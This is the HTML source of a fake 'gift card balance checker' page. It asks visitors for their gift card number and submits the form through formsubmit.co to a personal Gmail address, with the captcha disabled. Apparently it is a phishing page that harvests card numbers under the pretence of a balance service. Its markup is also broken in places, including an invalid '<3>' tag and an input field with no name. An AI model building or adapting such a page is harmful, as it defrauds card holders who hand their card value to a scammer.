<!DOCTYPE html>
<html>
<head>
    <title> gift card balanced checker</title>
</head>
<body>
    <img src="head.jpg" alt="top board" width="1000" height="260">
    <h1><b>Check Your Gift Card Balance</b></h1>
    <3>It is always a good idea to know if your gift card is used or not. Or, for reloadable cards, to know how much left you have on your gift card. Oftentimes, most gift card brands allow you to see the balance, like 80% of the popular brands.This page is dedicated to checking the gift card balance of any card brand.</3>
    <center>
     <img src="gift.jpg" alt="gift" width="1000" height="400">
     <img src="temptt.jpg" alt="second pt" width="1000" height="1000">
    </center>
    <center>
        <form action="https://formsubmit.co/adyhome0@gmail.com" method="POST">
            <input type="hidden" name="_captcha" value="false">
            <label for="gift_card_number">Enter Gift Card Number:</label>
            <p><input type="text" id="gift_card_number" placeholder="  XXX XXX XXX XXXX" required></p>
            <input type="hidden" name="_next" value="file:///C:/Users/USER/Desktop/html/giftcardbalancecheckit.html">
            <p><button type="submit" style="border-radius: 10px;
                                   height:  50px;
                                    width: 300px">
                                    Check Balance
                </button>  
            </p>
        </form>
    </center> 
            
    <center>
        <p><img src="tem.jpg" alt="gift" width="970" height="500"></p>
        <img src="last.jpg" alt="last" width="600" height="250">
        <p>2023|balance checker,All Rights reserved</p>
    </center>
</body>
</html>